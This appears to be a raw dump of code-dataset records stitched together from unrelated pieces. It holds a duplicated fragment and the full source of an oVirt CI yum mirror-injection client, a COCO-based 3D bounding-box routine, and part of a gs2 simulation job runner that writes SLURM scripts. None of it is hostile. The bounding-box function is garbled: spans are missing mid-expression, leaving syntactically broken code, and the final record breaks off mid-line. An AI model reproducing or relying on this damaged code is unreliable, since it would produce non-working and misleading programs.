argparse\nfrom base64 import b64decode\nimport json\n\nHTTP_TIMEOUT = 30\nHTTP_RETRIES = 3\nHTTP_RETRY_DELAY_SEC = 0.2\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n (mirrors_uri, configs, allow_proxy) = parse_args()\n mirrors_data = mirrors_from_uri(mirrors_uri)\n for conf in configs:\n inject_yum_mirrors_file(mirrors_data, conf, allow_proxy)\n\n\ndef parse_args():\n \"\"\"Parse positional arguments and return their values\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"mirrors\",\n help=\"Path or URL to a mirrors file.\"\n )\n parser.add_argument(\n \"configs\", nargs='+',\n help=\"A list of yum configs to modify.\"\n )\n parser.add_argument(\n \"-p\", \"--proxy\", action='store_true', default=False,\n help=\"If not specified, proxy will be set to None.\"\n )\n args = parser.parse_args()\n return args.mirrors, args.configs, args.proxy\n\n\ndef inject_yum_mirrors(\n mirrors, yum_cfg, out_cfg, allow_proxy=False, none_value=None\n):\n \"\"\"Inject yum mirrors into the given yum configuration\n\n :param Mapping mirrors: A mapping of mirror names to URLs\n :param file yum_cfg: YUM configuration file object to adjust\n :param file out_cfg: File object to write adjusted configuration into\n :param bool allow_proxy: Wether to allow 
{"seq_id":"34903596043","text":"#!/usr/bin/env python\n\"\"\"mirror_client.py - Client for oVirt CI transactional mirrors\n\"\"\"\nfrom six.moves import StringIO, range\nfrom six.moves.configparser import RawConfigParser\nfrom six.moves.urllib.parse import urlparse, urljoin\nfrom six import MAXSIZE, iteritems, string_types\nimport requests\nfrom requests.exceptions import ConnectionError, Timeout\nfrom os import environ\nimport glob\nimport logging\nimport yaml\nimport re\nfrom collections import Mapping\nfrom time import sleep\nimport argparse\nfrom base64 import b64decode\nimport json\n\nHTTP_TIMEOUT = 30\nHTTP_RETRIES = 3\nHTTP_RETRY_DELAY_SEC = 0.2\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n (mirrors_uri, configs, allow_proxy) = parse_args()\n mirrors_data = mirrors_from_uri(mirrors_uri)\n for conf in configs:\n inject_yum_mirrors_file(mirrors_data, conf, allow_proxy)\n\n\ndef parse_args():\n \"\"\"Parse positional arguments and return their values\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"mirrors\",\n help=\"Path or URL to a mirrors file.\"\n )\n parser.add_argument(\n \"configs\", nargs='+',\n help=\"A list of yum configs to modify.\"\n )\n parser.add_argument(\n \"-p\", \"--proxy\", action='store_true', default=False,\n help=\"If not specified, proxy will be set to None.\"\n )\n args = parser.parse_args()\n return args.mirrors, args.configs, args.proxy\n\n\ndef inject_yum_mirrors(\n mirrors, yum_cfg, out_cfg, allow_proxy=False, none_value=None\n):\n \"\"\"Inject yum mirrors into the given yum configuration\n\n :param Mapping mirrors: A mapping of mirror names to URLs\n :param file yum_cfg: YUM configuration file object to adjust\n :param file out_cfg: File object to write adjusted configuration into\n :param bool allow_proxy: Whether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n :param str none_value: Specify the value to set the 'proxy'\n configuration option to for disabling proxy use. This\n is '_none_' for older (< fc29) distros, and 'None'\n for newer ones. If None (the default) is passed,\n the value will be decided by the repo name suffix\n\n yum_cfg can be read-only, out_cfg should not be the same as yum_cfg.\n\n :returns: None\n \"\"\"\n oldcfg = RawConfigParser()\n newcfg = RawConfigParser()\n _readfp(oldcfg, yum_cfg)\n for section in oldcfg.sections():\n for repoid, baseurl in mirrors.get('before:' + section, []):\n mk_injected_section(\n oldcfg, newcfg, repoid, baseurl, allow_proxy, none_value\n )\n if section not in mirrors:\n copy_section(oldcfg, newcfg, section)\n else:\n mk_injected_section(\n oldcfg, newcfg, section, mirrors[section], allow_proxy,\n none_value\n )\n newcfg.write(out_cfg)\n\n\ndef copy_section(oldcfg, newcfg, section):\n \"\"\"Copy a configuration section between RawConfigParser objects\n\n :param RawConfigParser oldcfg: RawConfigParser to read from\n :param RawConfigParser newcfg: RawConfigParser to write to\n :param str section: The name of the section to copy\n \"\"\"\n if not oldcfg.has_section(section):\n return\n if not newcfg.has_section(section):\n newcfg.add_section(section)\n for option, value in oldcfg.items(section):\n newcfg.set(section, option, value)\n\n\ndef mk_injected_section(\n oldcfg, newcfg, section, baseurl, allow_proxy=False, none_value=None\n):\n \"\"\"Make a configuration section with injected mirror URL\n\n :param RawConfigParser oldcfg: RawConfigParser to take existing\n configuration values from\n :param RawConfigParser newcfg: RawConfigParser to write configuration\n section into\n :param str section: The name of the configuration section to\n make\n :param str baseurl: The mirror URL to inject\n :param bool allow_proxy: Whether to allow accessing the mirrors via\n HTTP proxies (defaults to False)\n :param str none_value: Specify the 'no-proxy' value - see docstring\n for inject_yum_mirrors for full explanation\n \"\"\"\n copy_section(oldcfg, newcfg, section)\n if not newcfg.has_section(section):\n newcfg.add_section(section)\n if none_value is None:\n none_value_str = none_value_by_repo_name(section)\n else:\n none_value_str = str(none_value)\n newcfg.set(section, 'baseurl', baseurl)\n newcfg.remove_option(section, 'mirrorlist')\n newcfg.remove_option(section, 'metalink')\n if not allow_proxy:\n newcfg.set(section, 'proxy', none_value_str)\n\n\ndef _readfp(cp, fp, filename=None):\n \"\"\"Fix Python 3.2+ compatibility\n\n RawConfigParser.readfp had been renamed to read_file in Python 3.2\n \"\"\"\n if hasattr(cp, 'read_file'):\n return cp.read_file(fp, filename)\n else:\n return cp.readfp(fp, filename)\n\n\ndef none_value_by_repo_name(repo_name):\n \"\"\"Auto-detect the no-proxy value from the repo name\n\n :param str repo_name: The name of the repo as appears in square brackets in\n the yum configuration file\n\n :rtype: str\n :returns: If the name of the repo ends witha distro suffix for a distro\n older then fc29, returns '_none_', otherwise returns 'None'\n \"\"\"\n m = re.search('-(?P<distro>fc|el)(?P<version>[0-9]+)$', repo_name)\n if not m:\n return 'None'\n newer_distros = {'fc': 29}\n if newer_distros.get(m.group('distro'), MAXSIZE) <= int(m.group('version')):\n return 'None'\n else:\n return '_none_'\n\n\ndef inject_yum_mirrors_str(\n mirrors, yum_cfg_str, allow_proxy=False, none_value=None\n):\n \"\"\"Inject yum mirrors into the given yum 
configuration string\n\n :param Mapping mirrors: A mapping of mirror names to URLs\n :param str yum_cfg: YUM configuration string to adjust\n :param bool allow_proxy: Whether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n :param str none_value: Specify the 'no-proxy' value - see docstring for\n inject_yum_mirrors for full explanation\n :rtype: str\n :returns: A string of the adjusted configuration\n \"\"\"\n out_cfg = StringIO()\n inject_yum_mirrors(\n mirrors, StringIO(yum_cfg_str), out_cfg, allow_proxy, none_value\n )\n out_cfg.seek(0)\n return out_cfg.read()\n\n\ndef inject_yum_mirrors_file(\n mirrors, file_name, allow_proxy=False, none_value=None\n):\n \"\"\"Inject yum mirrors into the given yum configuration file\n\n :param Mapping mirrors: A mapping of mirror names to URLs\n :param str file_name: YUM configuration file to adjust\n :param bool allow_proxy: Whether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n\n :param str none_value: Specify the 'no-proxy' value - see docstring for\n inject_yum_mirrors for full explanation\n :returns: None\n \"\"\"\n with open(file_name, 'r') as rf:\n with open(file_name, 'r+') as wf:\n inject_yum_mirrors(mirrors, rf, wf, allow_proxy, none_value)\n wf.truncate()\n logger.info('Injected mirrors into: {0}'.format(file_name))\n\n\ndef inject_yum_mirrors_file_by_pattern(\n mirrors, file_pattern, allow_proxy=False, none_value=None\n):\n \"\"\"Inject yum mirrors into the given yum configuration file\n\n :param Mapping mirrors: A mapping of mirror names to URLs\n :param str file_pattern: YUM configuration file glob pattern to adjust\n :param bool allow_proxy: Whether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n :param str none_value: Specify the 'no-proxy' value - see docstring for\n inject_yum_mirrors for full explanation\n :returns: None\n \"\"\"\n for file_name in glob.glob(file_pattern):\n inject_yum_mirrors_file(mirrors, file_name, allow_proxy, none_value)\n\n\ndef mirrors_from_http(\n url='http://mirrors-wdc.ovirt.org/repos/yum/all_latest.json',\n json_varname='latest_ci_repos',\n allow_proxy=False,\n none_value=None\n):\n \"\"\"Load mirrors from given URL\n\n :param str url: Where to find mirrors JSON file\n :param str json_varname: The variable in the file pointing to the mirror\n dictionary\n :param bool allow_proxy: Whether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n\n :rtype: dict\n :returns: Loaded mirrors data or an empty dict if could not be loaded\n \"\"\"\n if allow_proxy:\n proxies = dict()\n else:\n proxies = dict(http=None, https=None)\n try:\n loop_exception = None\n for attempt in range(0, HTTP_RETRIES):\n try:\n resp = requests.get(url, proxies=proxies, timeout=HTTP_TIMEOUT)\n if resp.status_code == 200:\n return resp.json().get(json_varname, dict())\n else:\n return dict()\n except ValueError as e:\n # When JSON parsing fails we get a ValueError\n loop_exception = e\n logger.warning(\n 'Encountered error getting data from mirrors server' +\n ' in attempt {0}/{1}'.format(attempt, HTTP_RETRIES)\n )\n # Sleep a short while to let server sort its issues\n sleep(HTTP_RETRY_DELAY_SEC)\n else:\n raise loop_exception\n except ConnectionError:\n logger.warning('Failed to connect to mirrors server')\n return dict()\n except Timeout:\n logger.warning('Timed out connecting to mirrors server')\n return dict()\n\n\ndef mirrors_from_file(file_name):\n \"\"\"Load mirrors from a local file\n\n :param str file_name: The file to load mirrors from\n\n The 
file can be JSON or YAML formatted\n\n :rtype: dict\n \"\"\"\n data = None\n with open(file_name, 'r') as f:\n data = yaml.safe_load(f)\n if not isinstance(data, Mapping):\n raise ValueError(\"Invalid mirrors data in '{0}'\".format(file_name))\n return data\n\n\ndef mirrors_from_data_url(url):\n \"\"\"Load mirrors from a data URL\n\n :param str url: The data URL to get mirrors from\n\n Accepted data URLs have the following syntax:\n\n data:application/json[;base64],<data>\n\n Where if `;base64` is present the data would be base64 encoded, otherwise\n it would be in plain text.\n\n :rtype: dict\n :returns: The mirror data embedded in the URL\n \"\"\"\n PREFIX = 'data:application/json'\n PLAIN_PREFIX = PREFIX + ','\n B64_PREFIX = PREFIX + ';base64,'\n if url.startswith(PLAIN_PREFIX):\n js = url[len(PLAIN_PREFIX):]\n elif url.startswith(B64_PREFIX):\n js = b64decode(url[len(B64_PREFIX):])\n else:\n return {}\n return json.loads(js)\n\n\ndef mirrors_from_uri(uri, json_varname='latest_ci_repos', allow_proxy=False):\n \"\"\"Load mirrors from URI\n\n :param str uri: The URI to mirrors JSON file\n :param str json_varname: The variable in the file pointing to the mirror\n dictionary\n :param bool allow_proxy: Whether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n\n :rtype: dict\n :returns: Loaded mirrors data or an empty dict if could not be loaded\n \"\"\"\n parsed = urlparse(uri)\n if parsed.scheme == 'http' or parsed.scheme == 'https':\n mirrors = mirrors_from_http(parsed.geturl(), json_varname, allow_proxy)\n elif parsed.scheme == '' or parsed.scheme == 'file':\n mirrors = mirrors_from_file(parsed.path)\n elif parsed.scheme == 'data':\n mirrors = mirrors_from_data_url(uri)\n mirrors = normalize_mirror_urls(mirrors, uri)\n mirrors = parse_mirror_includes(mirrors, json_varname, allow_proxy)\n return mirrors\n\n\ndef parse_mirror_includes(\n mirrors, json_varname='latest_ci_repos', allow_proxy=False\n):\n \"\"\"Parse and implement includes in the mirrors data\n\n :param Mapping mirrors: Mirrors data with or without includes\n :param str json_varname: The variable in the file pointing to the mirror\n dictionary\n :param bool allow_proxy: Whether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n\n Includes can be specified in mirrors data in two ways:\n 1. Adding an 'include:' key that points to a list of URLs. Data is read from\n each one of the URLs in the list and merged into the resulting mirrors\n data\n 2. 
Adding an 'include:before:' key that points to a list of name-url pairs.\n The data will be read from the URLs and then converted to insertion\n statements before the repos that start with `name`.\n\n :rtype: dict\n :returns: copy of the data in `mirrors` with all includes converted to\n included data\n \"\"\"\n parsed = {\n k: v for k, v in iteritems(mirrors) if not k.startswith('include:')\n }\n for uri in mirrors.get('include:', []):\n parsed = merge_mirrors(\n parsed, mirrors_from_uri(uri, json_varname, allow_proxy)\n )\n for repo_name, uri in mirrors.get('include:before:', []):\n parsed = merge_mirrors(parsed, mirrors_to_inserts(\n mirrors_from_uri(uri, json_varname, allow_proxy), repo_name\n ))\n return parsed\n\n\ndef merge_mirrors(a, b):\n \"\"\"Merge mirror data\n\n Merge the mirror data in b into the data in a so that:\n - A repo that is defined both in 'a' and 'b' remains with the URL defined\n in 'a'\n - When insertions to the same repo exist both in 'a' and 'b', the\n insertions from 'b' are added after the insertions from 'a'\n\n :rtype: dict\n \"\"\"\n merged = dict(a)\n for repo_name, repo_url in iteritems(b):\n if repo_name not in merged:\n merged[repo_name] = repo_url\n continue\n if ':' in repo_name:\n merged[repo_name].extend(repo_url)\n return merged\n\n\ndef mirrors_from_environ(\n env_varname='CI_MIRRORS_URL',\n json_varname='latest_ci_repos',\n allow_proxy=False,\n):\n \"\"\"Load mirrors from URL given in an environment variable\n\n :param str env_varname: The environment variable containing URL to mirrors\n JSON file\n :param str json_varname: The variable in the file pointing to the mirror\n dictionary\n :param bool allow_proxy: Whether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n\n :rtype: dict\n :returns: Loaded mirrors data or an empty dict if could not be loaded or\n the environment variable was not defined\n \"\"\"\n if env_varname not in environ:\n return dict()\n return mirrors_from_uri(environ[env_varname])\n\n\ndef normalize_mirror_urls(mirrors, base_uri):\n \"\"\"Turn relative URLs in mirrors to absolute ones\n\n :param Mapping mirrors: Mirror information map\n :param str base_uri: Base URI to add to relative URLs, usually the URI\n where the mirrors JSON file was obtained from\n\n :rtype: dict\n :returns: The mirror information given in `mirrors` with all the relative\n URLs turned into absolute ones\n \"\"\"\n return {\n repo_name: (\n urljoin(base_uri, uri) if isinstance(uri, string_types)\n else [\n urljoin(base_uri, inc_uri) for inc_uri in uri\n ] if repo_name == 'include:'\n else [\n [ins_repo_name, urljoin(base_uri, ins_uri)]\n for ins_repo_name, ins_uri in uri\n ]\n )\n for repo_name, uri in iteritems(mirrors)\n }\n\n\n
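To make the injection flow concrete, a small example run against inject_yum_mirrors_str defined above, e.g. from a Python shell after importing the module. The repo name and URLs are invented for illustration:

SAMPLE_CFG = """\
[ovirt-master-el7]
name=oVirt master nightly
mirrorlist=http://example.invalid/mirrorlist
enabled=1
"""

mirrors = {"ovirt-master-el7": "http://mirrors.example.invalid/ovirt-master-el7/"}
print(inject_yum_mirrors_str(mirrors, SAMPLE_CFG))
# The emitted section keeps 'name' and 'enabled', swaps in 'baseurl',
# drops 'mirrorlist'/'metalink', and - because '-el7' names a pre-fc29
# distro - sets proxy=_none_ via none_value_by_repo_name().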
def mirrors_to_inserts(mirrors, ins_repo_prefix, ins_type='before'):\n \"\"\"Convert a mirrors map into a set of repo insertions\n\n :param Mapping mirrors: Mirrors information map\n :param str ins_repo_prefix: The prefix for names of repos that the repos\n will be inserted with relation to\n :param str ins_type: (Optional) The type of insertion to create,\n currently, only 'before' is supported\n\n :rtype: dict\n :returns: A new mirror map where the repos in `mirrors` had been converted\n to insertion requests in the following way:\n - The last part of the repo name will be treated as a distro id,\n for example, for a repo called `foo-el7` the distro id would be\n `el7`.\n - The repo will become an insertion with relation to a repo with\n the prefix given in `ins_repo_prefix` and the same distro id.\n For example, if `ins_repo_prefix` is `bar`, a repo called\n `foo-el7` would be inserted in relation to `bar-el7`.\n - Existing insertion statements in `mirrors` are generally left\n as-is, but repos could be added into them.\n - In case there are multiple insertions with relation to the same\n repo, they would be ordered alphabetically according to repo\n name\n \"\"\"\n inserts = {k: v for k, v in iteritems(mirrors) if ':' in k}\n for repo_name, repo_url in sorted(iteritems(mirrors)):\n if ':' in repo_name:\n continue\n distro = repo_name.rsplit('-', 1)[-1]\n ins_key = u'{}:{}-{}'.format(ins_type, ins_repo_prefix, distro)\n inserts.setdefault(ins_key, []).append([repo_name, repo_url])\n return inserts\n\n\ndef setupLogging(level=logging.INFO):\n \"\"\"Basic logging setup for users of this script who don't want to bother\n with it\n\n :param int level: The logging level to setup (set to consts from the\n logging module, default is INFO)\n \"\"\"\n logging.basicConfig()\n logging.getLogger().level = level\n\n\ndef ovirt_tested_as_mirrors(\n ovirt_release,\n distributions=('el7', 'fc24', 'fc25', 'fc26'),\n repos_base='http://resources.ovirt.org/repos/ovirt/tested',\n):\n \"\"\"Generate a mirrors dict that points to the oVirt tested repos\n\n :param str ovirt_release: The oVirt release which tested repos we want\n :param Iterable distributions: (optional) the list of distributions oVirt\n is released for\n :param str repos_base: (optional) the base URL for the 'tested'\n repos\n\n The list passed to 'distributions' does not have to be accurate. The\n resulting dict is used in mirror injection (one of the inject_* functions\n above) so for a repo to be used, someone needs to ask for it by including a\n repo with the correct repo id in a yum configuration file. Therefore it is\n quite safe to include non-existent distros here, and it is also safe to\n omit some existing distros as long as they are not asked for.\n\n :rtype: dict\n :returns: A mirrors dict that will cause the URLs for tested repos to be\n injected for repos called 'ovirt-<release>-<distribution>'\n \"\"\"\n return dict(\n (\n 'ovirt-{0}-{1}'.format(ovirt_release, distribution),\n '{0}/{1}/rpm/{2}/'.format(repos_base, ovirt_release, distribution)\n ) for distribution in distributions\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"oVirt/jenkins","sub_path":"stdci_libs/mirror_client.py","file_name":"mirror_client.py","file_ext":"py","file_size_in_byte":19595,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"41142475276","text":"import os\nimport sys\nimport random\nimport math\nimport numpy as np\nimport argparse,configparser\nimport cv2\nimport json\n\n# COCO Class names\n# Index of the class in the list is its ID. 
For example, to get ID of\n# the teddy bear class, use: class_names.index('teddy bear')\nclass_names = [\n 'BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',\n 'bus', 'train', 'truck', 'boat', 'traffic light',\n 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',\n 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',\n 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',\n 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',\n 'kite', 'baseball bat', 'baseball glove', 'skateboard',\n 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',\n 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',\n 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',\n 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',\n 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',\n 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',\n 'teddy bear', 'hair drier', 'toothbrush']\n\ndef Cal3dBBox( boxes, masks, class_ids, scores, vp):\n N=boxes.shape[0]\n ret=[]\n if not N:\n return ret\n assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]\n\n for i in range(N):\n class_id=class_ids[i]\n if class_id not in [2,3,4,6,7,8]:\n continue\n # Bounding box\n if not np.any(boxes[i]):\n # Skip this instance. Has no bbox. Likely lost in image cropping.\n continue\n now=dict()\n now['box']=boxes[i]\n now['class_id']=class_id\n now['class_name']=class_names[class_id]\n now['score']=scores[i]\n y1, x1, y2, x2 = boxes[i]\n maskvec=[[[y-v[1],x-v[0]] for x in range(x1,x2) for y in range(y1,y2) if masks[y][x][i]] for v in vp]\n \n def CMPF(x,y):\n return math.atan2(x[1],x[0])-math.atan2(y[1],y[0])\n def CMPF1(x,y):\n return math.atan2(x[1],-x[0])-math.atan2(y[1],-y[0])\n \n def lineIntersection(a,b,c,d):\n a,b,c,d=np.array(a),np.array(b),np.array(c),np.array(d)\n denominator=np.cross(b-a,d-c)\n if abs(denominator)<1e-6:\n return False\n x=a+(b-a)*(np.cross(c-a,d-c)/denominator)\n return x\n\n from functools import cmp_to_key\n\n for j in range(2):\n maskvec[j].sort(key=cmp_to_key(CMPF))\n maskvec[2].sort(key=cmp_to_key(CMPF1))\n\n maskvec=np.array(maskvec)\n vp=np.array(vp)\n edg=[[maskvec[i][0][::-1],maskvec[i][-1][::-1]] if abs(math.atan2(maskvec[i][0][1],maskvec[i][0][0]))cross2[0]:\n cross1,cross2=cross2,cross1\n cross5=lineIntersection(vp[0], vp[0]+edg[0][0], vp[1], vp[1]+edg[1][1])\n cross6=lineIntersection(vp[0], vp[0]+edg[0][1], vp[1], vp[1]+edg[1][1])\n if cross5[0]>cross6[0]:\n cross5,cross6=cross6,cross5\n cross3=lineIntersection(vp[0], cross1, vp[2], cross5)\n cross4=lineIntersection(vp[0], cross2, vp[2], cross6)\n elif edg[1][0][0]*edg[1][-1][0]<0:\n cross1=lineIntersection(vp[0], vp[0]+edg[0][0], vp[2], vp[2]+edg[2][0])\n cross2=lineIntersection(vp[0], vp[0]+edg[0][0], vp[2], vp[2]+edg[2][1])\n if cross1[0]>cross2[0]:\n cross1,cross2=cross2,cross1\n cross5=lineIntersection(vp[1], vp[1]+edg[1][0], vp[0], vp[0]+edg[0][1])\n cross6=lineIntersection(vp[1], vp[1]+edg[1][1], vp[0], vp[0]+edg[0][1])\n if cross5[0]>cross6[0]:\n cross5,cross6=cross6,cross5\n cross3=lineIntersection(vp[1], cross1, vp[2], cross5)\n cross4=lineIntersection(vp[1], cross2, vp[2], cross6)\n else:\n cross1=lineIntersection(vp[0], vp[0]+edg[0][0], vp[1], vp[1]+edg[1][0])\n tmp1=lineIntersection(vp[0], vp[0]+edg[0][0], vp[2], vp[2]+edg[2][0])\n tmp2=lineIntersection(vp[1], vp[1]+edg[1][0], vp[2], vp[2]+edg[2][0])\n cross2=tmp1 if tmp1[1] len(self._input_files):\n\t\t\t\tn_jobs = 
len(self._input_files)\n\t\t\twhile n_jobs > 0:\n\t\t\t\tfor input_file in list(self._input_files):\n\t\t\t\t\tos.system(f\"mpirun -np 8 gs2 \\\"{input_file}\\\"\")\n\t\t\t\t\tself._input_files.remove(input_file)\n\t\t\t\t\tn_jobs -= 1\n\t\t\t\t\tif n_jobs == 0:\n\t\t\t\t\t\tbreak\n\t\telif self['system'] == 'viking':\n\t\t\tif n_par is None:\n\t\t\t\tn_par = 1\n\t\t\tif n_sim is None:\n\t\t\t\tn_sim = n_par\n\t\t\tos.makedirs(f\"{self.inputs['data_path']}/submit_files/\",exist_ok=True)\n\t\t\tinput_lists = {}\n\t\t\tfor n in range(n_par):\n\t\t\t\tinput_lists[n] = []\n\t\t\tif n_jobs == None or n_jobs*n_par > len(self._input_files):\n\t\t\t\ttotal_jobs = len(self._input_files)\n\t\t\telse:\n\t\t\t\ttotal_jobs = n_jobs*n_par\n\t\t\tinput_list = list(self._input_files)\n\t\t\tfor i in range(total_jobs):\n\t\t\t\tinput_lists[i%n_par].append(input_list[i])\n\t\t\t\tself._input_files.remove(input_list[i])\n\t\t\tfor n in range(n_par):\n\t\t\t\tsbatch_n = sbatch.replace(f\"{self.inputs['sbatch']['output']}\",f\"{self.inputs['sbatch']['output']}_{n}\")\n\t\t\t\tsbatch_n = sbatch_n.replace(f\"{self.inputs['sbatch']['error']}\",f\"{self.inputs['sbatch']['error']}_{n}\")\n\t\t\t\tfilename = f\"gyro_{n}\"\n\t\t\t\tpyth = open(f\"{self.inputs['data_path']}/submit_files/{filename}.py\",'w')\n\t\t\t\tpyth.write(f\"\"\"import os, sys\n\t\t\t\t\ninput_files = {input_lists[n]}\n\nif __name__ == '__main__':\n\tslurm_id = int(sys.argv[1])\n\tinput_file = input_files[slurm_id]\n\tos.system(f\"echo \\\\\\\"Input: {{input_file}}\\\\\\\"\")\n\tos.system(f\"srun --ntasks={self.inputs['sbatch']['cpus-per-task']} gs2 \\\\\\\"{{input_file}}\\\\\\\"\")\n\tif os.path.exists(f\\\"{{input_file[:-3]}}.out.nc\\\"):\n\t\tos.system(f\"touch \\\\\\\"{{input_file[:-3]}}.fin\\\\\\\"\")\"\"\")\n\t\t\t\tpyth.close()\n\t\t\t\tjobfile = open(f\"{self.inputs['data_path']}/submit_files/{filename}.job\",'w')\n\t\t\t\tjobfile.write(f\"\"\"{sbatch_n}\n#SBATCH --array=0-{len(input_lists[n])-1}\n\n{compile_modules}\n\nwhich gs2\ngs2 --build-config\n\npython {self.inputs['data_path']}/submit_files/{filename}.py $SLURM_ARRAY_TASK_ID\"\"\")\n\t\t\t\tif n_par > n_sim and n + n_sim < n_par:\n\t\t\t\t\tjobfile.write(f\"\\nsbatch {self.inputs['data_path']}/submit_files/gyro_{n+n_sim}.job\")\n\t\t\t\tjobfile.close()\n\t\t\tfor n in range(n_sim):\n\t\t\t\tos.system(f\"sbatch \\\"{self.inputs['data_path']}/submit_files/gyro_{n}.job\\\"\")\n\t\t
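# The viking path uses a SLURM job array: each array task indexes into its\n\t\t# job's input_files list via $SLURM_ARRAY_TASK_ID, and each job file\n\t\t# sbatch-es job n+n_sim on completion so only n_sim arrays queue at once.\n\t\t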
if self['system'] == 'archer2':\n\t\t\tif n_par is None:\n\t\t\t\tn_par = 1\n\t\t\tif n_sim is None:\n\t\t\t\tn_sim = n_par if n_par < 8 else 8\n\t\t\tif n_sim > 8:\n\t\t\t\tprint(\"Archer supports a maximum of n_sim = 8\")\n\t\t\t\tn_sim = 8\n\t\t\tos.makedirs(f\"{self.inputs['data_path']}/submit_files/\",exist_ok=True)\n\t\t\tinput_lists = {}\n\t\t\tfor n in range(n_par):\n\t\t\t\tinput_lists[n] = []\n\t\t\tif n_jobs == None or n_jobs*n_par > len(self._input_files):\n\t\t\t\ttotal_jobs = len(self._input_files)\n\t\t\telse:\n\t\t\t\ttotal_jobs = n_jobs*n_par\n\t\t\tinput_list = list(self._input_files)\n\t\t\tfor i in range(total_jobs):\n\t\t\t\tinput_lists[i%n_par].append(input_list[i])\n\t\t\t\tself._input_files.remove(input_list[i])\n\t\t\tfor n in range(n_par):\n\t\t\t\tsbatch_n = sbatch.replace(f\"{self.inputs['sbatch']['output']}\",f\"{self.inputs['sbatch']['output']}_{n}\")\n\t\t\t\tfilename = f\"gyro_{n}\"\n\t\t\t\tpyth = open(f\"{self.inputs['data_path']}/submit_files/{filename}.py\",'w')\n\t\t\t\tpyth.write(f\"\"\"import os\nfrom joblib import Parallel, delayed\nfrom time import sleep\n\ninput_files = {input_lists[n]}\n\ndef start_run(run):\n\tos.system(f\"echo \\\\\\\"Input: {{run}}\\\\\\\"\")\n\tos.system(f\"srun --nodes={self.inputs['sbatch']['nodes']} --ntasks={self.inputs['sbatch']['ntasks-per-node']} gs2 \\\\\\\"{{run}}\\\\\\\"\")\n\tif os.path.exists(f\\\"{{run[:-3]}}.out.nc\\\"):\n\t\tos.system(f\"touch \\\\\\\"{{run[:-3]}}.fin\\\\\\\"\")\n\telse:\n\t\tsleep(60)\n\t\tstart_run(run)\n\nParallel(n_jobs={self.inputs['sbatch']['nodes']})(delayed(start_run)(run) for run in input_files)\"\"\")\n\t\t\t\tpyth.close()\n\t\t\t\tjobfile = open(f\"{self.inputs['data_path']}/submit_files/{filename}.job\",'w')\n\t\t\t\tjobfile.write(f\"\"\"{sbatch_n}\n\n{compile_modules}\n\nwhich gs2\ngs2 --build-config\n\npython {self.inputs['data_path']}/submit_files/{filename}.py &\n\nwait\"\"\")\n\t\t\t\tif n_par > n_sim and n + n_sim < n_par:\n\t\t\t\t\tjobfile.write(f\"\\nsbatch {self.inputs['data_path']}/submit_files/gyro_{n+n_sim}.job\")\n\t\t\t\tjobfile.close()\n\t\t\tfor n in range(n_sim):\n\t\t\t\tos.system(f\"sbatch \\\"{self.inputs['data_path']}/submit_files/gyro_{n}.job\\\"\")\n\t\n\tdef run_ideal_jobs(self, n_jobs = None, n_par = None, n_sim = None):\n\t\tif self['system'] in ['viking','archer2']:\n\t\t\tcompile_modules = systems[self['system']]['modules']\n\t\t\tsbatch = \"#!/bin/bash\"\n\t\t\tfor key, val in self.inputs['sbatch'].items():\n\t\t\t\tif key == 'output' and '/' not in val:\n\t\t\t\t\tval = f\"{self.inputs['data_path']}/submit_files/{val}\"\n\t\t\t\tsbatch = sbatch + f\"\\n#SBATCH --{key}={val}\"\n\t\n\t\tif self['system'] == 'ypi_server':\n\t\t\tif n_jobs is None or n_jobs > len(self._ideal_input_files):\n\t\t\t\tn_jobs = len(self._ideal_input_files)\n\t\t\twhile n_jobs > 0:\n\t\t\t\tfor input_file in list(self._ideal_input_files):\n\t\t\t\t\tos.system(f\"ideal_ball \\\"{input_file}\\\"\")\n\t\t\t\t\tself._ideal_input_files.remove(input_file)\n\t\t\t\t\tn_jobs -= 1\n\t\t\t\t\tif n_jobs == 0:\n\t\t\t\t\t\tbreak\n\t\telif self['system'] == 'viking':\n\t\t\tif n_par is None:\n\t\t\t\tn_par = 1\n\t\t\tif n_sim is None:\n\t\t\t\tn_sim = n_par\n\t\t\tos.makedirs(f\"{self.inputs['data_path']}/submit_files/\",exist_ok=True)\n\t\t\tinput_lists = {}\n\t\t\tfor n in range(n_par):\n\t\t\t\tinput_lists[n] = []\n\t\t\tif n_jobs == None or n_jobs*n_par > len(self._ideal_input_files):\n\t\t\t\ttotal_jobs = len(self._ideal_input_files)\n\t\t\telse:\n\t\t\t\ttotal_jobs = n_jobs*n_par\n\t\t\tinput_list = list(self._ideal_input_files)\n\t\t\tfor i in range(total_jobs):\n\t\t\t\tinput_lists[i%n_par].append(input_list[i])\n\t\t\t\tself._ideal_input_files.remove(input_list[i])\n\t\t\tfor n in range(n_par):\n\t\t\t\tsbatch_n = sbatch.replace(f\"{self.inputs['sbatch']['output']}\",f\"{self.inputs['sbatch']['output']}_ideal_{n}\")\n\t\t\t\tsbatch_n = sbatch_n.replace(f\"{self.inputs['sbatch']['error']}\",f\"{self.inputs['sbatch']['error']}_ideal_{n}\")\n\t\t\t\tsbatch_n = 